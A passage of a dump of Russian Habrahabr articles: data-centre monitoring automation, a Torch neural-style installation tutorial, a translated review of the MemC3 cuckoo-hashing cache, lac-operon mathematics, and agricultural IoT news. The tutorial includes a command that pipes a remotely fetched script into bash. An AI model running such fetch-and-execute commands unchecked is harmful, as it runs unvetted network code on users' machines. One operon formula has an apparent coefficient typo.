Все потому, что человек — ленив, автоматика во многих случаях будет работать лучше. Но и здесь есть проблемы. Казалось бы, что может случиться после внедрения такой системы? Вроде бы основные проблемы решены, любая проблема не останется незамеченной. Но на самом деле некоторые важные вопросы остаются, зачастую, нерешенными. Более того, они встречаются очень часто. Речь идет о двух таких проблемах, и они мы поговорим в продолжении. Проблема 1: уведомление об ошибке — это еще не все Стратегией можно назвать поиск брокколи в магазинах и процесс покупки. Тактикой в данном случае можно назвать умение уговорить детей съесть приготовленное. Томас ЛаРок, SolarWinds
Прежде, чем углубляться в автоматизацию, будь то автоматическое обнаружение проблемы, отправка отчета или сценарий действий на случай непредвиденной ситуации, необходимо принять меры в отношении одной критической вещи. Речь идет о так называемом DPR цикле, который расшифровывается, как Detection, Prevention, Response. Другими словами, речь идет о процедуре обнаружения проблемы, предотвращении ее появления и ответных действиях сотрудников ЦОД в случае появления проблемы.
Сейчас остановимся на ошибках и сообщениях об их появлениях. Скажем, саппорт получил такое сообщение автоматической системы предупреждения, отлично. Теперь нужно разобраться в том, почему эта ошибка возникла, а также найти способ, позволяющий предотвратить в будущем ее повторное появление.
В процессе создания службы автоматических уведомлений об ошибках нужно также предусмотреть и то, что это только начало. Ведь нужно проделать еще и тяжелую работу по анализу ситуации, для того, чтобы найти причину возникновения нежелательной ситуации. После этого нужно создать дополнительные проверочные модули, направленные на идентификацию уже случившейся ситуации. Может быть, мы и уверены в том, что она уже не появится, но всякое может быть.
Автоматическая реакция на уведомления системы предупреждения позволяет немного расслабиться, ведь за все отвечает автоматика. Но инженеры должны все равно разбираться в том, почему проблема возникла. Автоматика, зачастую, на это неспособна. Проблема 2: разворачивание системы автоматизации мониторинга
Речь идет о том, что перед внедрением системы автоматизации необходимо иметь план того, что должна уметь такая система. Ее необходимо тщательно продумать, чтобы потом не было проблем. Ну а в плане нужно предусмотреть следующее: Наличие выборки тестовых машин. Это могут быть чисто «лабораторные» сервера, на которых будет отрабатываться система автоматизации, или машины, которые используются в ходе работы, но являющиеся по той либо иной причине менее приоритетными, чем все другие;
Не стоит отрабатывать ситуации, доводя работу машины до критической. Скажем, для отработки системы уведомлений о критической нагрузке на сервера не стоит доводить загрузку ресурсов системы до 90%, хватит и меньшего уровня;
Если система поддерживает логирование, то стоит эту функцию включить. В итоге, если случается проблема, вы будете понимать, что именно произошло и почему. Журнал событий должен быть максимально подробным;
В некоторых случаях не стоит отправлять уведомления о проблемах по e-mail. Все это провоцирует дополнительные задержки в работе. Представьте себе, что в почту пришло 740 сообщений, и с ними необходимо теперь разгребаться, открывая каждое уведомление по очереди. Лучше всего сохранять уведомления локально, выводя одновременно на дисплей;
Результаты тестирования системы уведомлений стоит обсудить с саппортом, возможно, представители команды поддержки посоветуют дельные вещи;
После того, как система отработана в тестовом варианте, стоит ее потихоньку вводить в работу. Причем разворачивать систему нужно не сразу всю, а поэтапно. Сначала включить ее для 10-20 систем. Затем оценить результаты. Потом расширить систему еще на 50 машин, и снова проверить. Поэтапное включение системы автоматизации уведомлений позволит избежать масштабных ошибок при разворачивании такой системы сразу на 100% машин. В последнем случае, если возникнет проблема, это может аукнуться всему дата-центру.
Если воспользоваться этими советами, можно увидеть недостатки системы автоматизации, и понять, как их исправить еще до того, как случится масштабный сбой. Для того, чтобы при реализации системы автоматизации использовать действительно актуальные инструменты, стоит постоянно обсуждать с командой последующие этапы работы. На что специалисты жалуются больше всего? Это и нужно решать в первую очередь.
Если все получится, то вы сможете избавить себя и команду от постоянно возникающих и повторяющихся ситуаций, на которые приходится тратить свое время, которого, естественно, всегда не хватает. То, что указано в материале — лишь малая часть работы по внедрении системы автоматизации мониторинга ЦОД. Часть уже была показана ранее, остальное планируем опубликовать в ближайшее время. | https://habrahabr.ru/company/kingservers/blog/317632/ |
habrahabr | Создайте свои собственные “Нейронные Картины” с помощью Глубокого Обучения | ['deep learning', 'neural networks', 'neural style', 'neural paintings', 'torch', 'caffe', 'lua', 'prisma', 'artisto'] |
Нейронные сети могут делать много разных вещей. Они могут понимать наши голоса, распознавать изображения и переводить речь, но знаете ли вы, что еще они умеют рисовать? Изображение сверху... |
Нейронные сети могут делать много разных вещей. Они могут понимать наши голоса, распознавать изображения и переводить речь, но знаете ли вы, что еще они умеют рисовать? Изображение сверху демонстрирует некоторые сгенерированные результаты применения нейронного рисования.
Сегодня я собираюсь познакомить вас с тем как это делается. Прежде всего, убедитесь, что у вас обновленная копия Ubuntu (14.04 — та, что использовал я). Вам необходимо иметь несколько гигов свободного пространства на жестком диске и в оперативной памяти, хотя бы не менее 6 GB (больше оперативки для б о льших выводимых разрешений). Для запуска Ubuntu как виртуальной машины, вы можете использовать Vagrant вместе с VirtualBox.
Убедитесь, что у вас установлен git. Чтобы скачать и установить git, просто откройте терминал и выполните: $ sudo apt-get install git
Шаг 1: Установите torch7 Torch — это фреймворк для научных вычислений с широкой поддержкой алгоритмов машинного обучения. Torch является главным пакетом Torch7, где определены структуры данных для многомерных тензоров и математические операции для них. Дополнительно, он предоставляет много утилит для доступа к файлам, сериализации объектов произвольных типов и другие полезные утилиты.
Запустите эти команды в терминале (вам может понадобиться использовать для них sudo ): $ cd ~/
$ curl -s https://raw.githubusercontent.com/torch/ezinstall/master/install-deps | bash
$ git clone https://github.com/torch/distro.git ~/torch --recursive
$ cd ~/torch; ./install.sh
Теперь нам надо обновить наши переменные окружения, запустите: $ source ~/.bashrc
Шаг 2: Установите loadcaffe
Выполните в терминале: $ sudo apt-get install libprotobuf-dev protobuf-compiler
$ luarocks install loadcaffe
Либо, если у вас возникают проблемы, попробуйте так: $ git clone [email protected]:szagoruyko/loadcaffe.git
$ ~/torch/install/bin/luarocks install loadcaffe/loadcaffe-1.0–0.rockspec
Шаг 3: Установите neural-style Это torch-реализация спецификации Нейронный Алгоритм Художественного Стиля Леона А. Гатиса, Александра С. Эккера и Маттиаса Бетге. Спецификация представляет алгоритм для комбинирования контента одного изображения со стилем другого изображения, используя сверточные нейронные сети.
Сначала склонируйте neural-style с GitHub: $ cd ~/
$ git clone https://github.com/jcjohnson/neural-style.git
Далее, скачайте модели нейронной сети: $ cd neural-style
$ sh models/download_models.sh
Шаг 4: Запускаем
Теперь убедитесь, что у вас есть хотя бы 6 GB оперативной памяти (если вы используете виртуальную машину, убедитесь, что выделили достаточное количество памяти для нее). Затем проверьте, работает ли нейронный стиль с помощью этой команды: $ th neural_style.lua -gpu -1 -print_iter 1
Заметьте, что вы выполняете это в режиме CPU, выполнение в режиме GPU выходит за рамки данной статьи.
Чтобы увидеть инструкции о том, как использовать нейронный стиль, запустите: $ th neural_style.lua ?
Теперь давайте выполним тестовую команду, чтобы убедиться, что нейронные стили работают. Для начала убедитесь, что вы находитесь в директории нейронных сетей, если вы следовали всем инструкциям выше, вы должны быть в ~/neural-network, теперь запустите: th neural_style.lua -style_image examples/inputs/starry_night.jpg -content_image examples/inputs/golden_gate.jpg -gpu -1 -image_size 256
Заметьте, я ввел меньший размер изображения, чтобы обработка закончилась быстрее. Когда команда завершится, выходной файл, со стандартным именем out.png, будет расположен в той же директории. Результат golden_gate.jpg starry_night.jpg out.png | https://habrahabr.ru/post/317622/ |
habrahabr | MemC3 — компактный Memcache с повышенной параллельностью — за счет более тупого кэширования и более умного хэширования | ['memcached', 'memcache', 'кеширование', 'алгоритмы', 'оптимизация кода'] | Это перевод обзора статьи «MemC3: Compact and Concurrent MemCache with Dumber Caching and Smarter Hashing» Fan et al. в Proceedings of the 10th USENIX Symposium on Networked Systems Design and... | Это перевод обзора статьи «MemC3: Compact and Concurrent MemCache with Dumber Caching and Smarter Hashing» Fan et al. в Proceedings of the 10th USENIX Symposium on Networked Systems Design and Implementation (NSDI’13), pdf тут Чуваки (бывший гугловец, чувак из университета Карнеги Меллон и еще один из Интел лабс) сделали улучшенный Memcached-совместимый кеш (по факту просто допилили мемкеш), и у них классные результаты производительности. Мне очень понравился обзор этой статьи в блоге "The morning paper" — описание алгоритмов и прочее. Курсивом — мои комментарии как переводчика. В основе MemC3 другой, чем в обычном мемкеше, алгоритм хэширования — оптимистичное "кукушечное" хеширование (cuckoo), и дополнительно к этому особый "CLOCK" алгоритм вытеснения. Соединенные вместе, они дают до 30% более эффективное использование памяти и увеличение производительности в запросах в секунду до 3 раз по сравнению с вашим обычным Memcached (при нагрузках с преобладающим чтением небольших объектов, что типично для мемкешей в Facebook).
В конце оригинальной статьи есть отличный разбор полученных результатов с точки зрения вклада примененных оптимизаций. Это выглядят это примерно так: Полная пропускная способность (по сети) в зависимости от числа тредов В этом разборе мы просто заценим алгоритмы, а детали их вкрячивания в мемкеш и методики перформанс тестирования, пожалуйста, читайте в оригинальной статье. Кукушечное хэширование Сначала разберемся с обычным кукушечным хешированием. Как работает самая обычная хэш-таблица? Вы хэшируете ключ и по этому хэшу выбираете ячейку таблицы (bucket или ведро:) , в которую нужно вставить или в которой можно найти соответствующее ключу значение. Куку-хэширование использует две хэш-функции, получается, две возможные ячейки для вставки или поиска значения. Рассмотрим следующую таблицу, в которой каждая строка представляет собой ячейку, в каждой из которых четыре слота для данных. Слот — это указатель на сами данные, объект пару ключ-значение.
Имея ключ для поиска, мы считаем для него два хеша и получаем две возможные ячейки. То есть нужно проверить 2 ячейки × 4 слота = 8 слотов, чтобы найти или не найти нужный ключ. То есть при поиске в такой хеш-таблице нужно много операций по сравнению с "обычной" хеш-таблицей. Кукушечное хэширование получило свое название из-за того, как обрабатывается операция вставки. Сперва мы хэшируем ключ X , который собираемся вставлять, используя обе хэш-функции, и получаем две возможные ячейки. Если какая-либо из этих ячеек имеет пустой слот, то сохраняем Х туда. Если же все слоты заняты, значит, пришло время какому-то ключу подвинуться. Случайно выбираем один слот в одной из этих двух ячеек и перемещаем (или "переселяем") из него ключ (назовем его Y ), таким образом освобождая место для записи X . Теперь хэшируем уже Y двумя хеш-функциями и находим вторую ячейку, где он мог бы находиться, и пытаемся вставить Y туда. Если все слоты этой ячейки тоже заполнены, то перемещаем какой-то ключ уже из этих слотов, чтобы освободить место для Y , и продолжаем делать так, пока пустой слот не найден (или пока не достигнем некоторого максимального количества перемещений, например, 500). Тут алгоритм ведет себя похоже на кукушку — вытаскивает чужой ключ из уже использованного места и кладет туда свой, отсюда и название. Если так и не получается найти свободный слот, то значит, эту хэш-таблицу пора расширять — увеличивать выделенную под нее память. Хотя такой алгоритм для вставки, кажется, может потребовать выполнения целой последовательности, цепочки перемещений, оценка временной сложности операции вставки для куку-хэширования — O(1). Цитата из оригинальной работы Использование тегов для улучшения операций поиска Из вышесказанного понятно, что происходит много выборок по ключу и много сравнений, и все это не слишком хорошо с точки зрения локальности данных. (Видимо, автор имеет в виду, что, поскольку ни ключи, ни даже хеши ключей не хранятся непосредственно в слотах ячеек таблицы, а хранятся в отдельно выделенных структурах ключ-значение, то происходит много рандомных обращений по памяти и полных сравнений ключей, что не позволяет хорошо работать процессорным кешам) Первое, что мы сделали для оптимизации куку-хэширования — ввели теги. Тег — это 1-байтовое хэш-значение ключа, и мы будем хранить его прямо в слоте хэш-таблицы рядом с указателем на ключ. Такие теги позволяют очень быстро (всего-то сравнив один байт) понять, может ли сохраненный ключ совпадать с искомым или нет, без необходимости извлекать его по указателю и целиком сравнивать. Могут происходить лишние извлечения для двух разных ключей, имеющих один и тот же тег, поэтому ключ всё равно надо извлекать и сравнивать полностью, чтобы убедиться, что он совпадает с искомым. С однобайтовыми тегами частота коллизий будет всего 1/2^8 = 0,39%. В случае проверки всех 8 слотов-кадидатов (например, при поиске отсутствующего ключа — miss'е), будет происходить в среднем 8 × 0,39% = 0,03 разыменований указателей. Поскольку каждая ячейка помещается в один блок процессорного кеша процессора (обычно 64 байт), в среднем каждый поиск обернется только в считывание двух блоков для проверки двух ячеек плюс либо 0.03 разыменований указателей в случае поиска отсутствующего ключа — miss'е, либо 1,03 в случае успешного поиска — hit'е. Цитата из оригинальной работы Использование тегов для улучшения операции вставки При определении двух возможных ячеек для ключа вместо использования двух хеш-функций, мы будем использовать только один хэш, а также дополнительный тег: пусть ячейка_1 = хэш(X), и у нас есть тег(X), то ячейка_2 = ячейка_1 ⊕ тег(X). Эта конструкция имеет следующее полезное свойство — можно определить ячейку_1, зная тег и ячейку_2. То есть при операциях перемещения ключа нам становится неважно, в какой ячейке лежал ключ, мы можем вычислить альтернативную ячейку без обращения к полному ключу. Поддержка параллельности доступа Наша схема хеширования, насколько нам известно, является первой реализацией с поддержкой параллельного доступа (multi-reader, single writer), обладающей высокой эффективностью использования памяти (даже при > 90% заполненности таблицы). Цитата из оригинальной работы Чтобы добавить параллелизма в такой алгоритм, нужно решить две проблемы: избежать дед-локов при получении лока на ячейки для записи, ведь мы не можем знать наперед, какие ячейки будут затронуты нашей операцией
избежать ложных кэш-миссов, когда в процессе перемещения какой-то ключ уже был убран из одной ячейки, но еще не вставлен в новую, а в этот момент произошло считывание.
Конечно, строго говоря, авторы не решили первую проблему, они просто забили на нее, так как позволяют одновременно выполняться лишь одной операции записи. В реальных условиях в профиле нагрузки часто доминирует чтение, так что это разумный компромисс.
Кеш-миссов (ложно отрицательных срабатываний) можно избежать, если сначала определить полную цепочку куку-перемещений, но еще ничего не перемещая, а затем выполнить эти перемещения в обратном порядке — от последнего пустого слота до желаемой исходной вставки. В сочетании с тем, что операции записи идут в один поток, получается, что каждый отдельный обмен гарантированно не вызывает каких-либо дополнительных перемещений и может быть выполнен без необходимости наперед блокировать всю цепочку. Самая прямолинейная реализация — брать блокировку на каждую из двух ячеек, участвующих в обмене (осторожно с порядком), и разблокировать их после обмена. Тут нужно два лока/релиза на каждый обмен. Мы пытались оптимизировать производительность для наиболее распространенного использования и воспользовались преимуществом наличия только одного треда записи, чтобы выстроить все insert'ы и lookup'ы в один поток последовательных операций с малым оверхедом. Вместо того, чтобы лочить ячейки, мы заводим на каждой ключ-счетчик версии. Увеличиваем счетчик при перемещении ключа при insert'е и следим за изменением версии во время lookup'а для детекта одновременно происходящего перемещения. Цитата из оригинальной работы Но где вы храните эти счетчики?? Если добавить их к каждому объекту ключ-значение, то будет использовано много памяти при сотнях миллионов ключей. Также появляется возможность для race-condition, поскольку эти объекты ключ-значение, хранятся за пределами самой хеш-таблицы и, таким образом, не защищены локами. Решение состоит в том, чтобы использовать массив счетчиков фиксированного размера — значительно меньшего, чем количество ключей. Массив в 8192 счетчиков влезает в 32KB кэш, и каждый счетчик используется для нескольких ключей, за счет использования нашего старого знакомого — хэширования. Такой компромисс, использование таких шареных счетчиков, по-прежнему даёт хорошую степень параллелизации доступа, сохраняя при этом вероятность "лишней повторной попытки" (счетчик версии увеличился на единицу для какого-то другого ключа, который имеет хэш коллизию в таблице счетчиков версий) низкой, примерно — 0,01%. Эти счетчики вписаны в общий алгоритм следующим образом: При необходимости перемещения какого-то ключа процесс вставки увеличивает счетчик версии этого ключа на единицу, чтобы обозначить происходящий процесс перемещения. После того, как ключ перемещен, счетчик увеличивается на единицу снова. Отсчет начинается с нуля, поэтому нечетные значения счетчика соответствуют заблокированным ключам, а четное — разблокированным.
Процесс поиска, который видит нечетное значение у счетчика, ждет и затем делает повторную попытку. Если же счетчик был четный, то нужно запомнить это значение, считать обе ячейки, а затем сравнить значение счетчика с запомненным. Если значение счетчика изменилось, то нужно повторить операцию заново.
Дополнительная хитрость для оптимизации куку-хеширования заключается в параллельном поиске нескольких возможных путей вставки. Это увеличивает шансы быстрее найти пустой слот. По тестам вышло, что оптимально проверять параллельно два возможных пути. Вытеснение по "ЧАСАМ" До сих пор мы говорили о вставках и поисках. И хотя оптимизированное куку-хэширование так же весьма эффективно использует память, все равно можно ожидать, что в какой-то момент наш кэш заполнится до предела (или почти до предела), и тогда нужно будет беспокоиться о вытеснении. В обычном Memcached используется политика вытеснения наиболее давно использованных ключей— LRU, но она требует по 18 байт на ключ (два указателя и 2-байтный счетчик ссылок), чтобы обеспечить безопасное вытеснение строго в порядке LRU. Это также привносит значительные накладные расходы на синхронизацию. В противоположность этому, MemC3 использует всего 1 бит на ключ с возможностью параллелизации операций. Это достигается за счет отказа от строгого LRU в пользу приблизительного LRU основанного на CLOCK алгоритме. Поскольку в нашем целевом случае преобладают мелкие объекты, то использование памяти снижается при использовании приближенного к LRU вытеснения, что позволяет кэшу хранить значительно больше записей, что, в свою очередь, улучшает общий хит-рейт. Как будет показано в разделе 5, такое управление вытеснением дает увеличение пропускной способности от 3 до 10 раз по сравнению с обычным Memcached, и все это при лучшем хит-рейте. Цитата из оригинальной работы Представьте циклический буфер битов и виртуальную часовую стрелку, указывающую на конкретное место в буфере. Каждый бит представляет "возраст" (давность использования) какого-то объекта пары ключ-значение. Бит равен '1', если соответствующий ключ использовался недавно, и '0' — в противном случае. Любая операция с ключом просто устанавливает соответствующий бит давности в '1'. При вытеснении нужно проверить тот бит, на который указывает стрелка часов. Если это '0', то можно вытеснить соответствующий ключ из кеша. Если это '1', то записываем туда '0' и сдвигаем стрелку часов вперед, на следующий бит. Этот процесс повторяется до тех пор, пока не найден нулевой бит. Процесс вытеснения интегрирован со схемой оптимистических блокировок следующим образом: Когда процесс вытеснения выбирает ключ-жертву X по CLOCK алгоритму, то он сначала увеличивает счетчик версии ключа X , чтобы сообщить остальным тредам, которые в настоящее время читают X , что им нужно попробовать позже еще раз; затем он удаляет X , делая его недоступным для последующего чтения, в том числе для тех повторных попыток от других тредов; и, наконец, увеличивает счетчик версии ключа X снова, чтобы завершить цикл изменений. Обратите внимание, что все вытеснения и вставки сериализуются с помощью локов, так что при обновлении счетчиков они не влияют друг на друга. Цитата из оригинальной работы На этом всё. Надеюсь, вам понравилось так же, как и мне. Подписывайтесь на хабра-блог okmeter.io! | https://habrahabr.ru/company/okmeter/blog/316762/ |
habrahabr | Математика биологических переключателей | ['биология', 'генные сети', 'системная биология', 'схемотехника'] | (продолжение. Предыдущая часть: «Автоматика из ДНК и белков: что у нее общего с электроникой?»)
Мы остановились на том, что лактозный оперон похож на логический элемент AND. Но откуда у него... | (продолжение. Предыдущая часть: «Автоматика из ДНК и белков: что у нее общего с электроникой?» )
Мы остановились на том, что лактозный оперон похож на логический элемент AND. Но откуда у него берутся цифровые свойства? Ведь оба входных сигнала (концентрации цАМФ и лактозы), вообще-то, аналоговые. Попробуем нарисовать входные функции лактозного оперона.
Каждый вход лактозного репрессора состоит из двух этапов молекулярного узнавания. Лактоза связывается с лактозным репрессором, а репрессор — с ДНК. В клетке находится несколько десятков молекул репрессора, каждая из которых, пока нет лактозы, может связываться с началом лактозного оперона. Когда она там связана, РНК-полимераза не может начать работу. Из-за теплового движения молекулы репрессора то и дело отваливаются от ДНК и присоединяются обратно. Если репрессора нет совсем, оперон работает на полную мощность (сейчас для простоты считаем, что катаболический активатор есть в избытке). При малых концентрациях репрессора он снижает активность оперона практически линейно. Но дальше эффект каждой новой порции репрессора все меньше и меньше, и в целом график зависимости близок к гиперболе y = 1 / (x + 1) матан Связывание репрессора с ДНК можно считать обратимой химической реакцией. Положение равновесия в обратимых химических реакциях описываются законом действующих масс. Что это такое?
Например, у нас есть реакция, в которой из веществ А и В образуется вещество С. Реакция обратима, то есть С может распадаться обратно на А и В в тех же самых условиях:
A + B <-> C
В колбе, где идет эта реакция, установится какое-то равновесие между прямым и обратным направлением реакции. В системе будут все три вещества А, В и С в каких-то концентрациях (в физической химии концентрацию вещества принято обозначать его символом в квадратных скобках, [A], [B] и [C] в нашем примере). Закон действующих масс связывает равновесные концентрации веществ между собой: произведение концентраций продуктов, деленое на произведение концентраций исходных веществ, постоянно.
[C] / ([A] * [B]) = K
Буквой К здесь обозначена константа равновесия реакции. Она зависит только от химической природы реакции (т. е. какие вещества реагируют) и от температуры. Концентрации веществ, давление, катализаторы и прочие факторы не влияют на константу равновесия.
Например, если мы добавим в колбу побольше исходного вещества А, то равновесие сдвинется в сторону вещества С, его концентрация возрастет, а концентрация вещества В (которого мы не добавляли) при этом упадет. Однако отношение [C] к ([A] * [B]) останется постоянным.
Итак, у нас есть обратимая реакция связывания активной формы репрессора с опероном: RepA + OpA <-> Op (связывание репрессора превращает активную форму оперона в неактивную). Она имеет свою константу равновесия К{R-O} = [Op] / ([OpA] * [RepA]). Нам надо получить отсюда зависимость [ОрА] (количества активной формы оперона) от [RepA] (концентрации репрессора). Еще мы знаем, что в клетке только один лактозный оперон, который может быть в активной или неактивной форме: [Op] + [OpA] = 1
Из второго уравнения выражаем [Op] через [OpA] и подставляем в первое уравнение:
К{R-O} = (1 — [OpA]) / ([OpA] * [RepA])
После преобразований получаем:
[OpA] = 1 / (K{R-O} * [RepA] + 1)
То есть функция имеет вид y = 1 / (x + 1)
Молекулы репрессора плавают в клетке и связываются с ДНК только пачками по четыре. Чтобы активная форма репрессора превратилась в неактивную, она должна связаться с четырьмя молекулами лактозы — одной или двух недостаточно, надо по одной молекуле лактозы на каждую белковую субъединицу счетверенного репресора. Пока лактозы в клетке мало, ее молекулы связываются с репрессором по одной-две и он остается активным. Но после некоторой пороговой концентрации лактозы большинство молекул репрессора связывают по четыре молекулы лактозы и переходят в неактивную форму. График активности репрессора в зависимости от количества лактозы поэтому имеет S-образную форму и описывается функцией вида y = 1 / (1 + x^4). Матан Теперь найдем зависимость [RepA] от концентрации лактозы [Lac]. Она так же выводится из закона действующих масс, с одной тонкостью: в связывании с репрессором участвуют четыре одинаковых молекулы лактозы.
RepA + 4 Lac <-> Rep
В уравнении для константы равновесия в этом случае появляются степени:
К{R-L} = [Rep] / ([RepA] * [Lac]^4)
Опять мы используем тот факт, что суммарная концентрация обоих форм репрессора постоянна:
[Rep] + [RepA] = n, где n ≈ 50
И получаем, что [RepA] = n / (К{R-L} * [Lac]^4 + 1)
Теперь, чтобы получить входную характеристику оперона по лактозе, надо подставить вторую функцию в первую. Она будет с точностью до коэффициентов иметь такой вид:
y = 1 / (1 + (1 / (1 + x^4)))
Ее график тоже S-образно изгибается. Получается, что лактозный оперон не реагирует на малые концентрации лактозы. При достижении пороговой концентрации появляются неактивные молекулы репрессора, связавшие по четыре лактозы, и оперон довольно резко включается.
Второй регуляторный вход лактозного оперона тоже состоит из двух шагов молекулярного узнавания: цАМФ связывается с активатором, а активатор — с ДНК. Отличие от лактозного входа в том, что здесь связывание молекул (активатора или цАМФ) повышает активность того, с чем они связались (оперона или активатора). То есть графики будут выходить из нуля и приближаться к горизонтальной прямой где-то выше оси Х. Матан Поскольку связывание цАМФ включает активатор, активная форма будет продуктом реакции, а не исходным веществом:
2 цАМФ + Akt <-> AktA
Константа равновесия K{Ц-А} = [AktA] / ([Akt] * [цАМФ]^2)
Опять мы пользуемся тем, что сумма концентраций [AktA] и [Akt] постоянна, так как в клетке есть около 100 молекул активатора, переходящих между активной и неактивной формой. Выражая [Akt] через [AktA], получаем:
K{Ц-А} = [AktA] / ((100 — [AktA]) * [цАМФ]^2)
[AktA] = K{Ц-А} * [цАМФ]^2 / (1 + K{Ц-А} * [цАМФ]^2)
То есть зависимость [AktA] от [цАМФ] имеет вид y = x^2 / (1 + x^2)
Из-за связывания двух молекул цАМФ график выглядит не как гипербола, а как S-образная кривая. Хотя пороговый эффект на ней заметен слабее, чем на графике для лактозы, потому что степень не четвертая, а только вторая.
Зависимость активности оперона от количества активатора имеет другой нюанс. Если связывание репрессора подавляет оперон почти полностью (где-то до 0,1%, что ниже погрешности биохимических измерений), то отсутствие активатора подавляет активность только до 5%. Поэтому график будет выходить не из нуля, а из точки (0; 0,05):
y = 0,05 + (0,95 * x / (1 + x)) Матан Состояние оперона «активатора нет, репрессора нет» тоже вносит вклад в синтез мРНК и соответствующих белков, поэтому
Активность = [OpA] + 0,05 * [Op]
Зависимость [OpA] от [AktA] мы можем легко вывести по аналогии с предыдущими тремя. Активатор связывается по одной штуке, значит, [AktA] будет входить в формулу в первой степени. Он активирует оперон, значит, [AktA] будет и в числителе, и знаменателе:
[OpA] = K{А-O} * [AktA] / (K{А-O} * [AktA] + 1)
То есть функция имеет вид y = x / (1 + x)
И это только вклад оперона, связанного с активатором! Чтобы учесть вклад оперона без активатора, надо добавить слагаемое (1 — эта дробь) * 0,05. К счастью, оба слагаемых имеют общий знаменатель, поэтому функция усложняется совсем немного:
y = 0,05 + (0,95 * x / (1 + x))
Осталось получить зависимость активности оперона от концентрации цАМФ. Для этого надо подставить первую формулу (для концентрации активного CAP в зависимости от концентрации цАМФ) во вторую формулу (для активности оперона от концентрации активного САР)…
… И получить четырехэтажную дробь:
У нас получилась самая сложная функция из всех в этой статье. Впрочем, ее график выглядит похоже на график более простой зависимости активного CAP от концентрации цАМФ, y = x^2 / (1 + x^2):
Тоже S-образная кривая с некоторым пороговым эффектом, которая медленно приближается к горизонтали y = 1. Только начинается не из нуля, а из точки (0; 0,05).
Осталось понять, как взаимодействуют два входа. В случае лактозного оперона ответ простой — никак. Лактозный репрессор и катаболический активатор не влияют на связывание друг друга с ДНК. Поэтому связывание этих двух белков можно считать независимыми событиями. Полная активность оперона достигается, когда и активатор связан, и репрессор не связан. Вероятность такого совпадения равна произведению вероятностей каждого из них по отдельности. Значит, чтобы получить функцию активности лактозного оперона от двух переменных ([Lac]) и ([цАМФ]), надо просто перемножить функции от каждой этой переменной:
Активность = (1 / (1 + (1 / (1 + [Lac]^4)))) * (0,05 + 0,095 * ([цАМФ]^2 / (1 + [цАМФ]^2)) / (1 + ([цАМФ]^2 / (1 + [цАМФ]^2))))
Трехмерный график этой функции
похож на плато, обрывающееся ущельями по двум сторонам. Правое ущелье (малые концентрации лактозы) более глубокое и плоскодонное, чем левое (малые концентрации цАМФ).
В реальной жизни кишечной палочки вокруг нее лактозы либо нет совсем (чаще всего), либо ее концентрация выше пороговой и лактозный репрессор практически не мешает работе оперона (когда хозяин съел что-то молочное). Концентрация цАМФ — это внутренний сигнал, который вырабатывается самой клеткой. Она тоже бывает либо слишком малой для включения лактозного оперона (когда есть глюкоза или крахмал), либо достаточной для включения на 95% и более (если ничего вкуснее лактозы нет). То есть почти всегда лактозный оперон находится в условиях либо плато на этом графике, либо в одном из ущелий.
Входные функции лактозного оперона измерены экспериментально. Способ измерения напоминает прием отладки микроконтроллеров «повесить светодиод на выходную ногу». Берется регуляторная область оперона и соединяется с геном зеленого флуоресцентного белка. Эта генная конструкция вставляется в клетки кишечной палочки, из которой удаляется штатный лактозный оперон (чтобы концентрация лактозы была жестко задана экспериментатором) и штатная система, кодирующая голод уровнями цАМФ. После этого активность лактозного оперона можно точно измерять спектрофотометром по уровню зеленой флюоресценции. Оказывается, что в пределах точности измерений (1%) теория полностью сходится с экспериментом ).
Дно левого ущелья на графике входной функции (при малых концентрациях цАМФ) находится выше нуля. Это не баг, а фича: благодаря ей при наличии нескольких сахаров сразу, кишечная палочка оказывается готова быстро переключиться на лактозу, когда глюкоза кончится. Мутанты кишечной палочки, у которых регуляторная функция лактозного оперона ближе к чистому AND (то есть без цАМФ оперон не работает), переключаются с глюкозы на лактозу по часу и более: в момент исчерпания глюкозы у них нет ферментов усвоения лактозы, а значит, нет и энергии, чтобы их быстро сделать. Нормальная кишечная палочка («дикий тип») встречает этот момент, уже имея сколько-то ферментов усвоения лактозы и ей хватает 15-20 минут для полного переключения на новый сахар.
Теперь отвлечемся от лактозного оперона и посмотрим шире, на что способны логические элементы на такой химической базе. Практически везде в биохимических сигнальных системах мы встречаем молекулярное узнавание, которое описывается функциями вида y = x^n / (1 + x^n) для активаторов и y = 1 / (1 + x^n) для репрессоров. Степень n в этих функциях показывает количество связываемых однотипных молекул для получения эффекта, и бывает обычно равна 1, 2 или 4 (чаще всего 2). Можно получить более сложные логические ключи, добавляя в начало оперона больше сайтов связывания регуляторных белков. Этих белков может быть больше двух типов. Эффекты разных белков на посадку РНК-полимеразы могут складываться (OR) или перемножаться (AND). Но в целом мы будем иметь дело с какой-то комбинацией (сложением или перемножением) базовых функций y = x^n / (1 + x^n) и y = 1 / (1 + x^n) с разными степенями и коэффициентами.
Некоторые интересные функции получаются очень просто. Например, один и тот же регуляторный белок может связываться (в спаренной форме) с двумя участками промотора. В одном участке он действует как репрессор, а в другом — как активатор. Для работы оперона надо, чтобы сайт репрессора был пуст, а сайт активатора — занят. Получается функция с четким максимумом:
y = (1/ (1 + x^2)) * (x^2 / (1 + x^2))
Без этого белка оперон неактивен, потому что пуст сайт активатора, а при высоких концентрациях он неактивен, потому что занят сайт репрессора. Максимальная активность будет, когда и сайт активатора, и сайт репрессора заняты с вероятностью 50%.
Еще можно сделать два сайта связывания активатора, в одном активатор будет сильно связываться с ДНК, но слабо активировать ген, в другом — слабо прикрепляться к ДНК, но сильно активировать ген. В этом случае получается функция вроде y = x^4 / (1 + x^4) + 0.3 * (10x)^4 / (1 + (10x)^4), со ступенчатым графиком:
Математики, ау! Можете рассказать в комментариях, что еще можно и что нельзя получить при сложении и перемножении этих базовых функций y = x^n / (1 + x^n) и y = 1 / (1 + x^n)?
В следующей части займемся схемами из таких логических элементов. | https://geektimes.ru/post/283686/ |
habrahabr | Вице-премьер Аркадий Дворкович поручил внедрить «Интернет вещей» в сельском хозяйстве | ['урожай', 'сельское хозяйство', 'ИТ', 'интернет вещей', 'обеспечение покрытием'] |
Согласно протоколу совещания у вице-премьера Аркадия Дворковича от 21 октября чиновник поручил своим подчиненным внедрить технологии интернета вещей в сельском хозяйстве, сообщают «Ведомости».... |
Согласно протоколу совещания у вице-премьера Аркадия Дворковича от 21 октября чиновник поручил своим подчиненным внедрить технологии интернета вещей в сельском хозяйстве, сообщают «Ведомости» . Эту информацию также подтверждают два человека, которые присутствовали в зале.
Поручение получили представители от Минсельхоза, Минпромторга и Минкомсвязи. Эти структуры займутся разработкой плана внедрения «интернета вещей» в агропромышленном комплексе, а также подготовят план по обеспечению доступа к сети Интернет на сельхозугодьях Воронежской области, Ставропольского и Краснодарского краев.
